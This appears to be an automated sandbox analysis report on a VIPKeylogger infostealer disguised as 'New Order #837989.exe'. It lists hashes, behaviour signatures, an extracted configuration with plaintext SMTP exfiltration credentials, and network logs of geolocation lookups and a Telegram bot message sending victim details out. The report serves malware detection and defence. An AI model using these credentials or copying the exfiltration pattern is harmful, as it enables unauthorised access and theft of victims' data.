Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2025 16:05

General

  • Target

    New Order #837989.exe

  • Size

    885KB

  • MD5

    d8f3a68154ffc12d0677b879a386dc0f

  • SHA1

    8be35f2b7a4c5454191181d72fc8da4eb7f48d1a

  • SHA256

    061bc2648b58846a4dc7cc468cbf1b4bcd2be744502ea0775b705b04ef536dfe

  • SHA512

    d119cd6f765b5de4095aba48ad0618623c78ebd9ca7c157d1cc48688af69e2b37e2e7a204dc01145c0c4425a113398c1feba26e84cc2df8a298a5bf4927942e8

  • SSDEEP

    12288:fzH2iNtAmJPkvxkTLj5+hMfgwBoyum1gfDWnKGv9TCf1povSAYqcv2ShtTFn+Kbt:fL1XAsWIL+MfDumwALv9mbOSAkZ+6us

Malware Config

Extracted

Family

vipkeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.aktagor-prom.by
  • Port:
    587
  • Username:
    office@aktagor-prom.by
  • Password:
    71z&rRC84
  • Email To:
    office@aktagor-prom.by

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe
    "C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe
      "C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1264

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.114.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.114.82.104.in-addr.arpa
    IN PTR
    Response
    5.114.82.104.in-addr.arpa
    IN PTR
    a104-82-114-5deploystaticakamaitechnologiescom
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    checkip.dyndns.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    132.226.247.73
    checkip.dyndns.com
    IN A
    158.101.44.242
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    193.122.130.0
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:29 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:30 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:35 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:38 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:41 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:42 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-us
    DNS
    73.247.226.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.247.226.132.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    reallyfreegeoip.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    reallyfreegeoip.org
    IN A
    Response
    reallyfreegeoip.org
    IN A
    104.21.112.1
    reallyfreegeoip.org
    IN A
    104.21.80.1
    reallyfreegeoip.org
    IN A
    104.21.32.1
    reallyfreegeoip.org
    IN A
    104.21.48.1
    reallyfreegeoip.org
    IN A
    104.21.64.1
    reallyfreegeoip.org
    IN A
    104.21.16.1
    reallyfreegeoip.org
    IN A
    104.21.96.1
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:31 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394985
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pxoMbHqUObozcOMqyHAuP9ZxXMkBHmtYo2PZWbBAgZcE0ilAh6LYN4J9vGqUqvAUwfHjc7WNrExOVCGm4Semh2nRn602Ga9RV2M4PMVVishYdbNKH1SWiqGTBpVcg1Yw22XXYE70"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beb4fe4bf1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=52240&min_rtt=47624&rtt_var=18642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=77818&cwnd=253&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=148&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394988
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FOA59A84sS3F3XzvMjW7PFXYssl9oOnQJWHZwlkgGOu0MJ0Z9vdsI0%2FM7tws9f9%2BCumwb63ZByyFGuopqTKLaHIOwZ8FrlBLeIQdLW9VGeD5516cI477Ln95cXBVLgGByyFbFThG"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081becb0f12f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=56762&min_rtt=47624&rtt_var=23024&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4272&recv_bytes=482&delivery_rate=77818&cwnd=254&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=3674&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394988
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2B2jt40NGDPEropet2bnNcztvFq2YUwaHM0F27J2vVlNSfBvhSs9jYfnciubu%2B4SLDJJGcYUji1Hy1%2FmmcM8%2B%2Bp8%2F1LrwYrVEltxobtwZlsel98g%2BVdZYgu24bFkcxMDqJSIFeTD"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beccdc3af1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=61308&min_rtt=47624&rtt_var=26361&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5542&recv_bytes=574&delivery_rate=77818&cwnd=255&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=3982&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:35 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394989
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ljf1PIcWqxKGO72Zwe4xGeERxKfa36UGunrwjfTVbs3prcQgr0dpymQv5nWqiAy6HPB%2BFmPui5ueA8XmenNsfujITCWJdoH0zoJxiD18C80c6kLYawoDp1JyPs6UfYZtcNnExGfP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081becec938f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=65972&min_rtt=47624&rtt_var=29099&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6821&recv_bytes=666&delivery_rate=77818&cwnd=256&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=4282&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:42 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394996
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVX7OWqEGscsQe2kucS8s8iuVUojF9lQ4UCkK6ox5ockmZyYZFaQMOXXRIdoqD6C8ptHUg1%2BdjP9b71maYorSJQDgj2lWWz80vg6eamdbtMUfXFe%2BmigygA6SUziAxpUJwj%2FalEV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beff3a7bf1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=69546&min_rtt=47624&rtt_var=28972&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8088&recv_bytes=758&delivery_rate=77818&cwnd=257&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=12039&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394997
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2PY5n5Kh%2FPueYrauiFmwdlZAm39lcz6xPd15C9CLMq4g071VRGsQ9wc3S2Uzd82SNscqqZljQ45V6DwO2rx7nvMaAKMvzs1BfK6KJm4HmWccBVaD8NPAdP7W9t7If0i3Ao73LAn"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081bf011817f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=73668&min_rtt=47624&rtt_var=29973&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9360&recv_bytes=850&delivery_rate=77818&cwnd=257&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=12325&x=0"
  • flag-us
    DNS
    1.112.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    New Order #837989.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    mail.aktagor-prom.by
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    mail.aktagor-prom.by
    IN A
    Response
    mail.aktagor-prom.by
    IN CNAME
    webmail.active.by
    webmail.active.by
    IN A
    178.159.242.77
  • flag-us
    DNS
    77.242.159.178.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.242.159.178.in-addr.arpa
    IN PTR
    Response
    77.242.159.178.in-addr.arpa
    IN PTR
    webmailactiveby
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 132.226.247.73:80
    http://checkip.dyndns.org/
    http
    New Order #837989.exe
    2.4kB
    4.9kB
    22
    21

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 104.21.112.1:443
    https://reallyfreegeoip.org/xml/181.215.176.83
    tls, http
    New Order #837989.exe
    1.7kB
    11.2kB
    19
    13

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    tls, http
    New Order #837989.exe
    1.2kB
    6.7kB
    11
    11

    HTTP Request

    GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

    HTTP Response

    404
  • 178.159.242.77:587
    mail.aktagor-prom.by
    New Order #837989.exe
    144 B
    92 B
    3
    2
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    5.114.82.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    5.114.82.104.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    New Order #837989.exe
    64 B
    176 B
    1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    158.101.44.242
    193.122.6.168
    132.226.8.169
    193.122.130.0

  • 8.8.8.8:53
    73.247.226.132.in-addr.arpa
    dns
    73 B
    158 B
    1
    1

    DNS Request

    73.247.226.132.in-addr.arpa

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    New Order #837989.exe
    65 B
    177 B
    1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    104.21.112.1
    104.21.80.1
    104.21.32.1
    104.21.48.1
    104.21.64.1
    104.21.16.1
    104.21.96.1

  • 8.8.8.8:53
    1.112.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    1.112.21.104.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    New Order #837989.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    mail.aktagor-prom.by
    dns
    New Order #837989.exe
    66 B
    111 B
    1
    1

    DNS Request

    mail.aktagor-prom.by

    DNS Response

    178.159.242.77

  • 8.8.8.8:53
    77.242.159.178.in-addr.arpa
    dns
    73 B
    104 B
    1
    1

    DNS Request

    77.242.159.178.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order #837989.exe.log

    Filesize

    1KB

    MD5

    8ec831f3e3a3f77e4a7b9cd32b48384c

    SHA1

    d83f09fd87c5bd86e045873c231c14836e76a05c

    SHA256

    7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

    SHA512

    26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

  • memory/1264-11-0x0000000000400000-0x000000000044A000-memory.dmp

    Filesize

    296KB

  • memory/1264-20-0x00000000072D0000-0x00000000077FC000-memory.dmp

    Filesize

    5.2MB

  • memory/1264-19-0x0000000006A50000-0x0000000006AA0000-memory.dmp

    Filesize

    320KB

  • memory/1264-18-0x0000000006BD0000-0x0000000006D92000-memory.dmp

    Filesize

    1.8MB

  • memory/1264-17-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1264-16-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1264-14-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-5-0x0000000005690000-0x000000000569A000-memory.dmp

    Filesize

    40KB

  • memory/1496-9-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-10-0x0000000005080000-0x000000000510E000-memory.dmp

    Filesize

    568KB

  • memory/1496-8-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

    Filesize

    4KB

  • memory/1496-7-0x0000000005C60000-0x0000000005C7E000-memory.dmp

    Filesize

    120KB

  • memory/1496-6-0x00000000058A0000-0x000000000593C000-memory.dmp

    Filesize

    624KB

  • memory/1496-15-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

    Filesize

    4KB

  • memory/1496-4-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-3-0x00000000055F0000-0x0000000005682000-memory.dmp

    Filesize

    584KB

  • memory/1496-2-0x0000000005C80000-0x0000000006224000-memory.dmp

    Filesize

    5.6MB

  • memory/1496-1-0x0000000000B60000-0x0000000000C44000-memory.dmp

    Filesize

    912KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.